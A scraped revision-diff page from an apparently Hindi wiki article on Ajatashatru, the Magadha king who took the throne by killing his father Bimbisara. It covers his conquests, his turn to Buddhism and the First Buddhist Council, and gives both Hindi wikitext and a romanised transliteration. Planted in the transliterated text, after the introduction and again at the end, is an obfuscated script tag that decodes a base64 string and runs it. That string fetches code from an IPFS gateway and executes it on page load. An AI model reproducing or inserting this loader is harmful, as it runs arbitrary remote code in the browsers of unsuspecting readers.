Difference between revisions of "अजातशत्रु"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(3 intermediate revisions by the same user not shown)
Line 1: Line 1:
'''अजातशत्रु''' (लगभग 495 ई.पू.) [[बिंबिसार]] का पुत्र था। उसके बचपन का नाम 'कुणिक' था। अजातशत्रु ने [[मगध]] की राजगद्दी अपने [[पिता]] की हत्या करके प्राप्त की थी। यद्यपि यह एक घृणित कृत्य था, तथापि एक वीर और प्रतापी राजा के रूप में उसने ख्याति प्राप्त की थी। अपने पिता के समान ही उसने भी साम्राज्य विस्तार की नीति को अपनाया और साम्राज्य की सीमाओं को चरमोत्कर्ष तक पहुँचा दिया। सिंहली अनुश्रुतियों के अनुसार अजातशत्रु ने लगभग 32 वर्षों तक शासन किया और 463 ई.पू. में अपने पुत्र उदयन द्वारा वह मारा गया।
+
'''अजातशत्रु''' (493 ई.पू. से 461 ई.पू.) [[बिंबिसार]] का पुत्र था। उसके बचपन का नाम 'कुणिक' था। अजातशत्रु ने [[मगध]] की राजगद्दी अपने [[पिता]] की हत्या करके प्राप्त की थी। यद्यपि यह एक घृणित कृत्य था, तथापि एक वीर और प्रतापी राजा के रूप में उसने ख्याति प्राप्त की थी। अपने पिता के समान ही उसने भी साम्राज्य विस्तार की नीति को अपनाया और साम्राज्य की सीमाओं को चरमोत्कर्ष तक पहुँचा दिया। सिंहली अनुश्रुतियों के अनुसार अजातशत्रु ने लगभग 32 वर्षों तक शासन किया और 461 ई.पू. में अपने पुत्र उदयन द्वारा वह मारा गया।
 
{{tocright}}  
 
{{tocright}}  
 
==साम्राज्य विस्तार==
 
==साम्राज्य विस्तार==
Line 5: Line 5:
  
 
कोसल के राजा [[प्रसेनजित]] को हराकर अजातशत्रु ने राजकुमारी 'वजिरा' से [[विवाह]] किया था, जिससे [[काशी]] जनपद स्वतः ही उसे प्राप्त हो गया था। इस प्रकार उसकी इस नीति से मगध शक्तिशाली राष्ट्र बन गया। परंतु पिता की हत्या करने और पितृघाती कहलाने के कारण [[इतिहास]] में वह सदा अभिशप्त रहा। पिता की हत्या करने के कारण इसका मन अशांत हो गया। यह अजीवक धर्म प्रचारक गोशाल और [[जैन धर्म]] प्रचारक [[महावीर स्वामी]] के निकट भी गया, किंतु इसे शांति नहीं मिली। फिर यह [[बुद्ध]] की शरण में गया, जहाँ उसे आत्मिक शांति मिली। इसके बाद यह बुद्ध का परम अनुयायी बन गया।<ref>{{cite book | last = | first =चंद्रमौली मणि त्रिपाठी  | title =दीक्षा की भारतीय परम्पराएँ  | edition = | publisher = | location =भारत डिस्कवरी पुस्तकालय | language =हिंदी  | pages =87  | chapter =}}</ref>
 
कोसल के राजा [[प्रसेनजित]] को हराकर अजातशत्रु ने राजकुमारी 'वजिरा' से [[विवाह]] किया था, जिससे [[काशी]] जनपद स्वतः ही उसे प्राप्त हो गया था। इस प्रकार उसकी इस नीति से मगध शक्तिशाली राष्ट्र बन गया। परंतु पिता की हत्या करने और पितृघाती कहलाने के कारण [[इतिहास]] में वह सदा अभिशप्त रहा। पिता की हत्या करने के कारण इसका मन अशांत हो गया। यह अजीवक धर्म प्रचारक गोशाल और [[जैन धर्म]] प्रचारक [[महावीर स्वामी]] के निकट भी गया, किंतु इसे शांति नहीं मिली। फिर यह [[बुद्ध]] की शरण में गया, जहाँ उसे आत्मिक शांति मिली। इसके बाद यह बुद्ध का परम अनुयायी बन गया।<ref>{{cite book | last = | first =चंद्रमौली मणि त्रिपाठी  | title =दीक्षा की भारतीय परम्पराएँ  | edition = | publisher = | location =भारत डिस्कवरी पुस्तकालय | language =हिंदी  | pages =87  | chapter =}}</ref>
 
 
==प्रथम बौद्ध संगीति==
 
==प्रथम बौद्ध संगीति==
 
{{main|प्रथम बौद्ध संगीति}}
 
{{main|प्रथम बौद्ध संगीति}}
अजातशत्रु के समय की सबसे महत्त्वपूर्ण घटना [[बुद्ध]] का महापरिनिर्वाण (464 ई.पू.) थी। उस घटना के अवसर पर बुद्ध की अस्थि प्राप्त करने के लिए अजातशत्रु ने भी प्रयत्न किया था और अपना अंश प्राप्त कर उसने [[राजगृह]] की पहाड़ी पर [[स्तूप]] बनवाया था। आगे चलकर राजगृह में ही वैभार-पर्वत की 'सप्तपर्णी गुहा' से बौद्ध संघ की [[प्रथम बौद्ध संगीति]] हुई, जिसमें [[सुत्तपिटक]] और [[विनयपिटक]] का संपादन हुआ। यह कार्य भी इसी नरेश के समय में संपादित हुआ था।
+
अजातशत्रु के समय की सबसे महत्त्वपूर्ण घटना [[बुद्ध]] का महापरिनिर्वाण (464 ई.पू.) थी। उस घटना के अवसर पर बुद्ध की अस्थि प्राप्त करने के लिए अजातशत्रु ने भी प्रयत्न किया था और अपना अंश प्राप्त कर उसने [[राजगृह]] की पहाड़ी पर [[स्तूप]] बनवाया था। आगे चलकर राजगृह में ही वैभार-पर्वत की '[[सप्तपर्णि गुहा]]' से बौद्ध संघ की [[प्रथम बौद्ध संगीति]] हुई, जिसमें [[सुत्तपिटक]] और [[विनयपिटक]] का संपादन हुआ। यह कार्य भी इसी नरेश के समय में संपादित हुआ था।
  
{{seealso|अनुरुद्ध}}
 
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
Line 25: Line 23:
 
*[http://www.palikanon.com/english/pali_names/am/ajatasattu.htm Entry on '''Ajatasattu''' in the Buddhist Dictionary of Pali Proper Names]
 
*[http://www.palikanon.com/english/pali_names/am/ajatasattu.htm Entry on '''Ajatasattu''' in the Buddhist Dictionary of Pali Proper Names]
 
==संबंधित लेख==
 
==संबंधित लेख==
{{बौद्ध धर्म}}{{बुद्ध के शिष्य}}
+
{{हर्यक वंश}}{{भारत के राजवंश}}{{बुद्ध के शिष्य}}
[[Category:इतिहास_कोश]]
+
[[Category:हर्यक वंश]][[Category:प्राचीन भारत का इतिहास]][[Category:इतिहास_कोश]][[Category:बौद्ध धर्म कोश]][[Category:चरित कोश]]
[[Category:बौद्ध धर्म कोश]][[Category:धर्म कोश]]
 
[[Category:चरित कोश]]
 
 
__INDEX__
 
__INDEX__

Latest revision as of 12:45, 5 May 2016

ajatashatru (493 ee.poo. se 461 ee.poo.) bianbisar ka putr tha. usake bachapan ka nam 'kunik' tha. ajatashatru ne magadh ki rajagaddi apane pita ki hatya karake prapt ki thi. yadyapi yah ek ghrinit krity tha, tathapi ek vir aur pratapi raja ke roop mean usane khyati prapt ki thi. apane pita ke saman hi usane bhi samrajy vistar ki niti ko apanaya aur samrajy ki simaoan ko charamotkarsh tak pahuancha diya. sianhali anushrutiyoan ke anusar ajatashatru ne lagabhag 32 varshoan tak shasan kiya aur 461 ee.poo. mean apane putr udayan dvara vah mara gaya.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

samrajy vistar

ajatashatru ne aang, lichchhavi, vajji, kosal tatha kashi janapadoan ko apane rajy mean milakar ek vishal samrajy ko sthapit kiya tha. pali granthoan mean ajatashatru ka nam anek sthanoan par aya hai, kyoanki vah buddh ka samakalin tha aur tatkalin rajaniti mean usaka b da hath tha. ganga aur son nadi ke sangam par pataliputr ki sthapana usi ne ki thi. usaka mantri 'vassakar' ek kushal rajanitijn tha, jisane lichchhaviyoan mean phoot dalakar samrajy ko vistrit kiya tha. prasenajit ka rajy kosal ke rajakumar vidoodabh ne chhin liya tha. usake rajatvakal mean hi vidoodabh ne shaky prajatantr ko samapt kiya tha.

kosal ke raja prasenajit ko harakar ajatashatru ne rajakumari 'vajira' se vivah kiya tha, jisase kashi janapad svatah hi use prapt ho gaya tha. is prakar usaki is niti se magadh shaktishali rashtr ban gaya. parantu pita ki hatya karane aur pitrighati kahalane ke karan itihas mean vah sada abhishapt raha. pita ki hatya karane ke karan isaka man ashaant ho gaya. yah ajivak dharm pracharak goshal aur jain dharm pracharak mahavir svami ke nikat bhi gaya, kiantu ise shaanti nahian mili. phir yah buddh ki sharan mean gaya, jahaan use atmik shaanti mili. isake bad yah buddh ka param anuyayi ban gaya.[1]

pratham bauddh sangiti

  1. REDIRECTsaancha:mukhy

ajatashatru ke samay ki sabase mahattvapoorn ghatana buddh ka mahaparinirvan (464 ee.poo.) thi. us ghatana ke avasar par buddh ki asthi prapt karane ke lie ajatashatru ne bhi prayatn kiya tha aur apana aansh prapt kar usane rajagrih ki paha di par stoop banavaya tha. age chalakar rajagrih mean hi vaibhar-parvat ki 'saptaparni guha' se bauddh sangh ki pratham bauddh sangiti huee, jisamean suttapitak aur vinayapitak ka sanpadan hua. yah kary bhi isi naresh ke samay mean sanpadit hua tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. diksha ki bharatiy paramparaean (hiandi), 87.

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>